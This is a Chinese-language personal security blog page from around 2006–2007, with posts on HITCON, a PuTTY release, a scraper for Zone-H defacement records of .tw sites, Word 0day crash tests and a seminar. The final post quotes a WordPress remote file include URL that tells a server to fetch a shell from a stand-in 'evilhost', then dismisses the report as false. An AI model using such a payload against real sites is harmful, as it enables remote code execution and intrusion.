HITcon - Hacks In Taiwan Conference ,
是台灣較大型的駭客技術研討會.
從 2005 年開始舉辦, 至今是第三屆.
會中除了有來自各方的高手發表研究心得外,
場內也舉辦了 Wargame 的競賽, 勝者還有不少獎金 ~
例如去年玩 Wargame 回來後就寫了這篇 紀錄 ...
而今年, 照往例, 日前 HIT 開始向四方高手 Call For Paper
詳情請上該 網站 參閱 :)
新增留言 2007-03-10 22:47
著名的 ssh client putty
在 2007-01-24 時 release 了 0.59 版
詳細的 ChangeLog 可以參考 這裡
實際用起來 , 不用啥工具測 , 就可以明顯的感覺到初始連線時變快了 !
另外就是 plink 更好用囉 ~
新增留言 2007-01-25 15:22
之前敝人寫了個簡單的 script
用來 parse 國外著名的網站 Zone-H 上 , .tw 網域的被黑紀錄
每隔幾天就會上去翻翻最近的紀錄
但今早要看的時候 , 留意到了 Build Time ... 怎麼是十幾個小時前 ?
表示這十幾個小時以來該 script 沒有抓到新紀錄 ...
實際上去看 , 會看到帥氣的被黑畫面 XD
蠻難得見的 , mi 下來作紀錄 :p
UPDATE:
一時不查 被誤導了 :p
看來是 dns 被搞爛了
正常的 Zone-H 在 213.219.122.11
但是今天常常會查到 72.232.163.74 這個 IP
就會看到被黑的那個畫面 XD
2 則留言 2007-01-24 02:06
國外有個著名網站叫 Zone-H
專給一些入侵他人網站的 cracker 放置個人紀錄
用以張顯其惡名
雖然沒有數據顯示 .tw 網域中,
上面的資料和實際遭入侵的網站比例有多少 ...
但幾乎每天都有好幾個網站被列在上面 , 也是不錯的觀察來源 ...
於是寫了個簡單的 script , 定期把上面近一週的資料 parse 出來
代替一些人工做的事 -
1. 列出 .tw 網域的 Digital Attacks Archive
2. 對每一筆紀錄, 列出 時間、入侵紀錄、作業系統、以及幾個連結方便查詢 ...
3. 而對每一個入侵紀錄點, 會去看其目前的狀態,
如此只要看到是被加了一個檔案, 且狀態是 200 的話, 就知道該網站還沒修了 :p
4. 顯示該網站主網頁的 title , 方便快速判斷其可能是什麼單位 ..
目前是一天跑兩次 , 放在 http://outian.net/zone-h/
有任何建議請來信指教 :)
註:所有資料均取自 Zone-H , 一切紀錄皆與我無關 XD
–
啊啊 我真是吃飽太閒了 ... zz
6 則留言 2007-01-09 15:10
繼前幾天爆過 Microsoft Word 的 0day 漏洞後
這一個星期下來,又接連爆了幾個
並且在 milw0rm 上也有了 PoC
我實際測試了幾個可以開 Word 檔案的軟體,結果是
Microsoft Word 2007 - Crash
OpenOffice Writer on Linux - Crash
OpenOffice Writer on Windows - Crash
Abiword on Linux - OK
Abiword on Windows - OK
12/06 的消息
原始網站在 http://secunia.com/advisories/23232/
看到這句 『Successful exploitation may allow execution of arbitrary code.』 就知道是大洞了
表示要種木馬開後門都可以
包括 2000/XP/2003/... 全都中獎
解決方法 - 還沒有官方patch, 暫時自己保重, 不要開啟來路不明的 Word 檔案 !
真的要開危險文件的話, 可以用 AbiWord 或 OpenOffice Writer 頂一下 ~
新增留言 2006-12-07 11:45
想要免錢的 PS3 嗎 ?
拿下 http://ps3.shimpinomori.net/index_en.html 就有了
眾黑鬼們快上啊 ~
新增留言 2006-11-29 11:52
今年的主題是 『資安』
報名網址在 http://samc.study-area.org/sa2006/
由於會場關係, 據說人數有限, 有興趣的人請趕快 ~
講師陣容很堅強, 無一不是台灣資安界的名人, Topic 也都是近年來非常熱的話題 -
| TT | 網路技術當紅炸子雞 AJAX 會帶來什麼危險? |
| Winggy | Unix 資安通論 |
| PK | 電腦鑑識與應變經驗談 |
| TimHsu | Linux Kernel Security Overview |
| Birdman | Defeating Spyware and Rootkit with Behavior Based Techniques |
沒意外的話, 當天我也會到場
歡迎大家找我喝茶 :>
新增留言 2006-11-29 11:49
到公司上班, 難免會有一些機密資料
會怕一旦筆記型電腦、或隨身碟不見時, 流出去就麻煩了
於是開始找一些加密資料的 Solution ...
有在留意安全消息的人, 最近可能會看到這個標題然後嚇一跳 -
『 Wordpress functions.php remote file include vulnerability 』
ex: http://www.securityfocus.com/bid/21004
啥 !? Wordpress 這麼多人用的 blog 系統,
連最新的 2.0.5 都還有這麼大的洞洞 !?
原發表者指出可以用
http://www.target.com/wp-includes/functions.php?file=http://evilhost/shell.txt
讓 server 去執行遠端的檔案,
理論上如果成立的話就可以直接拿到 shell .
........ !!
哈, 免驚, 其實這是個芭樂 !
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| « Nov | ||||||
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 | |||